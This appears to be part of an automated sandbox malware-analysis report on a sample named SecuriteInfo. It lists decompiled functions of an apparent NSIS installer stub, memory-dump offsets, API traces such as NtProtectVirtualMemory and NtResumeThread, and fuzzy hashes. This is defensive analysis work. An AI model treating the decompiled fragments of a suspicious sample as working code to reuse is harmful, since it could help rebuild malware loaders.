Function 02AD2572 Relevance: 3.2, APIs: 2, Instructions: 157filelibraryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,9D909E4F,0B0E5984), ref: 02AD275E
LoadLibraryA.KERNELBASE(?), ref: 02AD3203

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CreateFileLibraryLoad
String ID:
API String ID: 2049390123-0
Opcode ID: b613a91650e683100a9454aff71c5bc8ee2ff07ebdb0d99fb3b00b29b7220acf
Instruction ID: fd431d2e9b7cbc6cd5f6503b55ef6ddfeb3798f8ca78b63009e4a63f76206ed0
Opcode Fuzzy Hash: b613a91650e683100a9454aff71c5bc8ee2ff07ebdb0d99fb3b00b29b7220acf
Instruction Fuzzy Hash: 22512674B44346DFEF346E7899A57EB77A2AF15390F84402EEC8A9B201DB354985CB02

Uniqueness

Uniqueness Score: -1.00%

Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406873(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4302b8;
			}

0x0040687e
0x00406887
0x00000000
0x00406894
0x0040688a
0x00000000

APIs

FindFirstFileW.KERNELBASE(75AF3420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75AF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75AF3420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
FindClose.KERNEL32(00000000), ref: 0040688A

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD

Uniqueness

Uniqueness Score: -1.00%

Function 02AC5A6B Relevance: 1.8, APIs: 1, Instructions: 257libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 02AD3203

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bf431e50725fce77dd54170505b4e4488689cf81dd0cb4c7d28af66e6ccf7df8
Instruction ID: 6fb4aaa480cfc0ed17ffc06f0f9b5570c510d247b069f56852c78ceaaf7ffd5f
Opcode Fuzzy Hash: bf431e50725fce77dd54170505b4e4488689cf81dd0cb4c7d28af66e6ccf7df8
Instruction Fuzzy Hash: EB816975A4034ADFDF349E288D647DA37A3AF657A0FD5412DDC899B204E7358A82CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02AD6648 Relevance: 1.6, APIs: 1, Instructions: 88nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(00000001,02AD6DFF), ref: 02AD68CC

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b7fae60c55ca882dff55560fbe4d999b2fdcec32e3df060f09d599a22cff2744
Instruction ID: e41a18277c12b923c016e1b652fb8884b7bcc00e0155312cc3daae4770594a50
Opcode Fuzzy Hash: b7fae60c55ca882dff55560fbe4d999b2fdcec32e3df060f09d599a22cff2744
Instruction Fuzzy Hash: 8921253574530ADBCB399E68A5C06EE77BAEF45B50F24402ECC478B605DF319448CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02AD5FDA Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(3704DE41,?,?,?,?,02AD5091,-0000000115BF1CF6,02AC177A), ref: 02AD6092

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d840eadb1688fcd57cbf88ef0210ea18566cb4b9c5b3df86bd5bad4ce47229d7
Instruction ID: 73b29be268474d36b4ec47a73a88412aa8ebd64ad891da455356630e4a0e633c
Opcode Fuzzy Hash: d840eadb1688fcd57cbf88ef0210ea18566cb4b9c5b3df86bd5bad4ce47229d7
Instruction Fuzzy Hash: B4118B7460478BDFDB249E2CC8A47EA37B6EF99390F88402EDC8997240D7715E06C610

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040290B(short __ebx, short* __edi) {
				void* _t8;
				void* _t21;

				_t8 = FindFirstFileW(E00402DA6(2), _t21 - 0x2dc); // executed
				if(_t8 != 0xffffffff) {
					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653D();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040291a
0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 2616af6840be9ad065c7271e10669628003eadbae38ac98b1b8d582da80c65e5
Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
Opcode Fuzzy Hash: 2616af6840be9ad065c7271e10669628003eadbae38ac98b1b8d582da80c65e5
Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t146;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x42d250 = _t34;
					if(_t130 == 0x110) {
						 *0x434f08 = _t127;
						 *0x42d264 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b230 = _t91;
						E00404499(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
						 *0x433ecc = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x42d250 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x434f20;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044E5(0x40b);
						while(1) {
							_t36 =  *0x42d250;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x434f24;
							if(_t38 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433ecc - _t136; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404499(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x434f8c - _t136;
							_v28 = _t48;
							if( *0x434f8c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004044BB(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x42b230, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d264);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x42b230);
							}
							E004044CE();
							E0040653D(0x42d268, E00403F7B());
							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x42d268); // executed
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433ed8); // executed
									 *0x42c240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x433ed8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404499(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433ecc - _t136; // 0x0
									if(__eflags != 0) {
										goto L63;
									}
									ShowWindow( *0x433ed8, 8); // executed
									E004044E5(0x405);
									goto L60;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L63;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x433ed8);
						 *0x434f08 = _t136;
						EndDialog(_t127,  *0x42ba38);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x433ed8, 0x40f, 0, 1);
						__eflags =  *0x433ecc - _t136; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									L28:
									return E00404500(_a8, _t122, _a16);
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x434f8c - _t136;
											if( *0x434f8c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x42ba38 = 1;
												L23:
												_push(0x78);
												L24:
												E00404472();
												goto L28;
											}
											E0040140B(_t129);
											 *0x42ba38 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x433ed8);
						 *0x433ed8 = _t122;
						L60:
						if( *0x42f268 == _t136) {
							_t146 =  *0x433ed8 - _t136; // 0x10418
							if(_t146 != 0) {
								ShowWindow(_t127, 0xa); // executed
								 *0x42f268 = 1;
							}
						}
						goto L63;
					}
					asm("sbb eax, eax");
					ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
					if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
						goto L28;
					} else {
						ShowWindow(_t127, 4);
						goto L8;
					}
				}
			}

0x00403fa5
0x00403fac
0x00404113
0x00404117
0x0040411b
0x0040411d
0x00404122
0x0040412d
0x00404138
0x0040413d
0x0040413f
0x00404141
0x00404144
0x00404149
0x00404157
0x00404164
0x0040416b
0x0040416b
0x0040416c
0x0040416c
0x00404171
0x00404177
0x0040417e
0x00404184
0x00404186
0x004041c6
0x004041cb
0x004041d0
0x004041d0
0x004041d5
0x004041de
0x004041e0
0x004041e5
0x004041eb
0x004041ef
0x004041ef
0x004041f4
0x004041fa
0x00000000
0x00000000
0x00404205
0x0040420b
0x00000000
0x00000000
0x00404214
0x0040421c
0x00404221
0x00404224
0x0040422a
0x0040422f
0x00404232
0x00404238
0x0040423d
0x00404240
0x00404246
0x0040424e
0x00404254
0x0040425a
0x0040425e
0x00404265
0x00404265
0x00404265
0x0040426f
0x00404281
0x0040428d
0x00404292
0x0040429c
0x004042a2
0x004042a4
0x004042a9
0x004042a6
0x004042a6
0x004042a6
0x004042b9
0x004042d1
0x004042d3
0x004042d9
0x004042ee
0x004042db
0x004042e4
0x004042e6
0x004042e6
0x004042f4
0x00404305
0x0040431b
0x00404322
0x00404328
0x0040432c
0x00404331
0x00404333
0x00000000
0x00404339
0x00404339
0x0040433b
0x00000000
0x00000000
0x00404341
0x00404345
0x0040436a
0x00404370
0x00404376
0x00404378
0x00000000
0x00000000
0x0040439e
0x004043a4
0x004043a6
0x004043ab
0x00000000
0x00000000
0x004043b1
0x004043b4
0x004043b7
0x004043ce
0x004043da
0x004043f3
0x004043f9
0x004043fd
0x00404402
0x00404408
0x00000000
0x00000000
0x00404412
0x0040441d
0x00000000
0x0040441d
0x00404347
0x0040434d
0x00000000
0x00000000
0x00404353
0x00404359
0x00000000
0x00000000
0x00000000
0x0040435f
0x00404333
0x0040442a
0x00404436
0x0040443d
0x00000000
0x00404188
0x00404188
0x0040418b
0x004041be
0x004041be
0x004041c0
0x00000000
0x00000000
0x00000000
0x004041c0
0x0040418d
0x00404191
0x00404196
0x00404198
0x00000000
0x00000000
0x004041a8
0x004041b0
0x00000000
0x004041b6
0x00403fbe
0x00403fbe
0x00403fc2
0x00403fc7
0x00403fd6
0x00403fd6
0x00403fdc
0x00403fe3
0x00404027
0x0040402d
0x00404046
0x00404049
0x0040405c
0x00404062
0x00404100
0x00000000
0x00404109
0x00404068
0x00404073
0x00404075
0x00404077
0x00404096
0x00404096
0x00404099
0x0040409e
0x004040a1
0x004040b1
0x004040b2
0x004040b4
0x004040ea
0x004040fa
0x00000000
0x004040fa
0x004040b6
0x004040bc
0x004040d5
0x004040da
0x004040dc
0x00000000
0x00000000
0x004040de
0x004040ca
0x004040ca
0x004040cc
0x004040cc
0x00000000
0x004040cc
0x004040bf
0x004040c4
0x00000000
0x004040c4
0x004040a3
0x004040a9
0x00000000
0x00000000
0x004040ab
0x00000000
0x004040ab
0x0040409b
0x00000000
0x0040409b
0x00404081
0x00404088
0x0040408e
0x00404090
0x00404466
0x00000000
0x00404466
0x00000000
0x00404090
0x0040404e
0x00000000
0x00404056
0x00404035
0x0040403b
0x00404443
0x00404449
0x0040444b
0x00404451
0x00404456
0x0040445c
0x0040445c
0x00404451
0x00000000
0x00404449
0x00403fea
0x00403ff6
0x00403fff
0x00000000
0x0040401e
0x00404021
0x00000000
0x00404021
0x00403fff

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
ShowWindow.USER32(?), ref: 00403FF6
GetWindowLongW.USER32(?,000000F0), ref: 00404008
ShowWindow.USER32(?,00000004), ref: 00404021
DestroyWindow.USER32 ref: 00404035
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
GetDlgItem.USER32(?,?), ref: 0040406D
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
IsWindowEnabled.USER32(00000000), ref: 00404088
GetDlgItem.USER32(?,00000001), ref: 00404133
GetDlgItem.USER32(?,00000002), ref: 0040413D
SetClassLongW.USER32(?,000000F2,?), ref: 00404157
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
GetDlgItem.USER32(?,00000003), ref: 0040424E
ShowWindow.USER32(00000000,?), ref: 0040426F
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
EnableWindow.USER32(?,?), ref: 0040429C
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
EnableMenuItem.USER32(00000000), ref: 004042B9
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
SetWindowTextW.USER32(?,0042D268), ref: 00404322
ShowWindow.USER32(?,0000000A), ref: 00404456

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: e7f11a10533a611f3fe78e549378f399a66bd747c21cf404ab37e5123baac86e
Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
Opcode Fuzzy Hash: e7f11a10533a611f3fe78e549378f399a66bd747c21cf404ab37e5123baac86e
Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEC Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403BEC(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				intOrPtr _t41;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434f10;
				_t22 = E0040690A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d268;
					L"1033" = 0x30;
					 *0x442002 = 0x78;
					 *0x442004 = 0;
					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
					__eflags =  *0x42d268;
					if(__eflags == 0) {
						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406484(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403EC2(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne";
				 *0x434f80 =  *0x434f18 & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405F14(_t90, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne") != 0) {
					L16:
					if(E00405F14(_t98, _t86) == 0) {
						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EC2(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E00405672(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433ecc; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d248, 5); // executed
							_t39 = E0040689A("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040689A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433ea0);
								 *0x433ec4 = _t87;
								RegisterClassW(0x433ea0);
							}
							_t41 =  *0x433ee0; // 0x0
							_t44 = DialogBoxParamW( *0x434f00, _t41 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
							E00403B3C(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434f00;
						 *0x433ea4 = E00401000;
						 *0x433eb0 =  *0x434f00;
						 *0x433eb4 = _t30;
						 *0x433ec4 = 0x40a380;
						if(RegisterClassW(0x433ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432ea0;
					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
					_t63 =  *0x432ea0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432ea2;
						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653D(_t86, E00405E0C(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E58(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403bf2
0x00403bfb
0x00403c02
0x00403c04
0x00403c18
0x00403c2a
0x00403c33
0x00403c3c
0x00403c43
0x00403c48
0x00403c4f
0x00403c62
0x00403c62
0x00403c6d
0x00403c06
0x00403c11
0x00403c11
0x00403c72
0x00403c7c
0x00403c85
0x00403c8a
0x00403c9b
0x00403d2d
0x00403d35
0x00403d3e
0x00403d3e
0x00403d54
0x00403d5a
0x00403d68
0x00403de9
0x00403df1
0x00403dfb
0x00403e00
0x00403e06
0x00403e90
0x00403e95
0x00403e97
0x00403eb3
0x00000000
0x00403eb3
0x00403e99
0x00403e9f
0x00403ea7
0x00403ea7
0x00000000
0x00403e9f
0x00403e14
0x00403e1f
0x00403e24
0x00403e26
0x00403e2d
0x00403e2d
0x00403e38
0x00403e40
0x00403e42
0x00403e44
0x00403e4d
0x00403e50
0x00403e56
0x00403e56
0x00403e5c
0x00403e75
0x00403e86
0x00000000
0x00403e8b
0x00403df3
0x00403df5
0x00000000
0x00403d6a
0x00403d6a
0x00403d76
0x00403d80
0x00403d86
0x00403d8b
0x00403d9a
0x00403eb8
0x00403eb8
0x00000000
0x00403eb8
0x00403da9
0x00403de4
0x00000000
0x00403de4
0x00403ca1
0x00403ca1
0x00403ca4
0x00403ca6
0x00000000
0x00000000
0x00403cb4
0x00403cc6
0x00403ccb
0x00403cd4
0x00000000
0x00000000
0x00403cda
0x00403cdc
0x00403ce9
0x00403ce9
0x00403cf2
0x00403cf8
0x00403d20
0x00403d28
0x00000000
0x00403d0a
0x00403d0b
0x00403d14
0x00403d1a
0x00403d1b
0x00000000
0x00403d1b
0x00403d16
0x00403d18
0x00000000
0x00000000
0x00000000
0x00403d18
0x00403cf8

APIs

Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937

